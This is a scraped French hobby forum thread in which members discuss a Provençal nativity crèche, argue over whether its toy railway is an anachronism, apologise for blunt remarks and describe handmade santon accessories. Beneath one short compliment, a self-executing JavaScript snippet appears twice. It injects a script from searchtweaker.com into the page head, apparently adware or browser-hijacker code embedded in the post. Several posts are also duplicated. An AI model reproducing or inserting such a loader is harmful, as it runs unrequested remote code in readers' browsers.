ma crèche 2014
+4
Henri91
pascal83
Michel
Douchka
8 participants
Page 1 sur 1
ma crèche 2014
bonjour voici des photos de ma crèche , j'en mettrai des plus nettes en fin de semaine avec des explications . a bientôt
Douchka- Messages : 8
Re: ma crèche 2014
Attendons d'avoir une vue d'ensemble. Est-ce que la voie ferrée est vraiment nécessaire?
Michel- Messages : 1857
Crèche sympa, mais j'aime un peu moins la voie ferrée.
pascal83- Messages : 1304
Salut Douchka,
Bravo pour ta crèche, moi rien ne me choque ! , car si on se lance dans la chasse aux anachronismes, il faudra drôlement expurger nos crèches en commençant par les mairies et en finissant par les églises, sans parler des vitriers et autres facteurs.
Ton train, m'a donné une idée, si toutefois j'y arrive ! dans le future, c'est de remplacer la loco par un tram, qui s’arrête devant les joueurs de boules qui ont transformé la rue en boulodrome (j'ai vu cela sur une BD, Asterix il me semble !)..
Bravo pour ta crèche, moi rien ne me choque ! , car si on se lance dans la chasse aux anachronismes, il faudra drôlement expurger nos crèches en commençant par les mairies et en finissant par les églises, sans parler des vitriers et autres facteurs.
Ton train, m'a donné une idée, si toutefois j'y arrive ! dans le future, c'est de remplacer la loco par un tram, qui s’arrête devant les joueurs de boules qui ont transformé la rue en boulodrome (j'ai vu cela sur une BD, Asterix il me semble !)..
bonjour a tous, j'ai mis du temps a répondre car les deux premiers commentaires mon donné envie de ne plus revenir sur le forum! heureusement des meilleurs ont suivi! je pense que mon train n'est pas déplacé car si l'on veux situé la crèche a l'époque de la naissance de jésus , on ne serait pas en Provence mais a Bethléem! et rien ne serait conforme il manquerait les esclaves ;la fosse au lions et j'en passe....donc un peu moins de rigidité et contentons nous d'admirer le travail que chacun réalise pour sa crèche. pour moi elles sont toutes belles et servent a piocher des idées pour améliorer chacun la sienne!bonne journée a tous
Je n'ai pas voulu être blessant Douchka. A partir du moment ou on publie ( rendre public) sur un forum, il faut s'attendre à des avis divers et variés. En plus les remarques permettent d'évoluer, c'est du moins comme cela que je prends celles qui me sont adressées. Quand j'ai rédigé le commentaire, j'étais sur la tablette, pas sur l'ordinateur donc j'ai fait court, le message a l'habitude de disparaître après deux ou trois lignes. Poser une question comme je l'ai fait n'était pas en soi une critique, j'étais étonné.
Il faut aussi reconnaître que les dernières photos montrent beaucoup mieux les détails et témoignent d' un ensemble homogène. On se rend beaucoup mieux compte des heures de travail. Pour les anachronismes, chacun fait comme il le ressent en suivant plus ou moins fidèlement la tradition. Régis Bertrand parlait d'une Provence irénique et lénifiante.
Voilà, si j'ai encore vexé, désolé, ce n'est pas le but.
Il faut aussi reconnaître que les dernières photos montrent beaucoup mieux les détails et témoignent d' un ensemble homogène. On se rend beaucoup mieux compte des heures de travail. Pour les anachronismes, chacun fait comme il le ressent en suivant plus ou moins fidèlement la tradition. Régis Bertrand parlait d'une Provence irénique et lénifiante.
Voilà, si j'ai encore vexé, désolé, ce n'est pas le but.
Michel- Messages : 1857
Jolie crèche.... Une belle surprise. Bravo
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
LOU PESCADOU- Messages : 106
Mon point de vue concernant votre crèche
Michel a écrit:Attendons d'avoir une vue d'ensemble. Est-ce que la voie ferrée est vraiment nécessaire?
Agréable à regarder dans l'ensemble mais... la voie ferrée n'a pas lieu d'être ainsi que le château en arrière plan. Les saynètes sont sympatiques
Bella- Messages : 1
Belle crèche ! J'aime bien l'effet de neige sur les conifères .J'aimerais faire un jour une crèche sous la neige.
Ne prends surtout pas mal les critiques qui ne sont faites que pour nous améliorer.
Supposons qu'aucune critique ne se fasse et nous resterions toujours avec nos erreurs.
En fait la crèche provençale à pris naissance à la suite de la révolution et pendant longtemps les santons ont revêtu le costume de cette époque ainsi que les constructions.
Mais peu à peu on évolue vers une époque moins ancienne tout en ne faisant pas trop moderne.
Pour ma part j'aimerais bien introduire un vieux vélo que je trouve amusant mais j'hésite...
Ne prends surtout pas mal les critiques qui ne sont faites que pour nous améliorer.
Supposons qu'aucune critique ne se fasse et nous resterions toujours avec nos erreurs.
En fait la crèche provençale à pris naissance à la suite de la révolution et pendant longtemps les santons ont revêtu le costume de cette époque ainsi que les constructions.
Mais peu à peu on évolue vers une époque moins ancienne tout en ne faisant pas trop moderne.
Pour ma part j'aimerais bien introduire un vieux vélo que je trouve amusant mais j'hésite...
Zolino50- Messages : 1455
Bonjour,
Vu que beaucoup de santonniers vendent la gare, et qu'on trouve même chez certains, le poinçonneur, pas celui des lilas, mais celui du PLM !... Donc il faut bien qu'il y ai un train !...
A la limite on pourrait suggérer à notre ami, de faire un réseaux ferré, moins important en surélevant la plateforme au dessus des rails, ce qui les rendraient partiellement souterrain. Mais bon, c'est sa crèche et il fait ce qui lui est agréable ! . Et si il a des enfants ou (et) petits enfants (surtout garçons), ils doivent être ravis !.
Zolino : Le vélo, il me semble que ça existe déjà en santon !, mais ancien, draisienne ou grand-bi, faudra, je pense le fabriquer.
Vu que beaucoup de santonniers vendent la gare, et qu'on trouve même chez certains, le poinçonneur, pas celui des lilas, mais celui du PLM !... Donc il faut bien qu'il y ai un train !...
A la limite on pourrait suggérer à notre ami, de faire un réseaux ferré, moins important en surélevant la plateforme au dessus des rails, ce qui les rendraient partiellement souterrain. Mais bon, c'est sa crèche et il fait ce qui lui est agréable ! . Et si il a des enfants ou (et) petits enfants (surtout garçons), ils doivent être ravis !.
Zolino : Le vélo, il me semble que ça existe déjà en santon !, mais ancien, draisienne ou grand-bi, faudra, je pense le fabriquer.
bonsoir a tous , merci pour toutes vos réponses qui font chaud au cœur! et oui je mets une locomotive et trois wagons que j'ai transformé en train de noël et les enfants adorent et cela mets de la vie dans la crèche comme le bruit de l'eau de la rivière qui fait trois mères de long; ma crèche fait 5mètres sur 1,5 mètres. je vous mets quelques photos mais mon appareil photo n'est pas très bon!
mon premier santon est la porteuse de courge, c'est moi qui ai fabriqué toutes les courges et l'étalage
la c'est le jardinier avec les différents légumes et fleurs que j'ai créé également
la c'est saint Ambroise patron des apiculteur, c'est une pièce unique que j'ai acheté sur la plus grande fête médiévale en belgique , a bruxelles , le santonier qui l'a fait venait de marseille et s'appelle BUCHY
ces deux béliers sont aussi ds pièces unique de chez BUCHY
la c'est les boulangers et tous les petits accessoires , dont le four , que j'ai fabriqué également
et maintenant c'est le "cagadou" et j'ai construit sa petite cabane autour c'est le personnage le plus insolite de ma crèche et il a beaucoup de succès!
mon premier santon est la porteuse de courge, c'est moi qui ai fabriqué toutes les courges et l'étalage
la c'est le jardinier avec les différents légumes et fleurs que j'ai créé également
la c'est saint Ambroise patron des apiculteur, c'est une pièce unique que j'ai acheté sur la plus grande fête médiévale en belgique , a bruxelles , le santonier qui l'a fait venait de marseille et s'appelle BUCHY
ces deux béliers sont aussi ds pièces unique de chez BUCHY
la c'est les boulangers et tous les petits accessoires , dont le four , que j'ai fabriqué également
et maintenant c'est le "cagadou" et j'ai construit sa petite cabane autour c'est le personnage le plus insolite de ma crèche et il a beaucoup de succès!
Suite à des travaux chez moi, je n'ai pu répondre avant. Ma réponse au sujet de la crèche n'était pas une attaque, mais mon gout personnel. En aucun cas je pourrait dire c'est pas beau, ou faut pas faire cela. Chaque crèches est faite au gout personnel de son auteur, et je le respect.
Alors désolé si j'ai blessé quelqu'un à ce sujet.
Mais à part le train que j'aime moins, les scènes de la crèche sont bien sympa.
Alors désolé si j'ai blessé quelqu'un à ce sujet.
Mais à part le train que j'aime moins, les scènes de la crèche sont bien sympa.
pascal83- Messages : 1304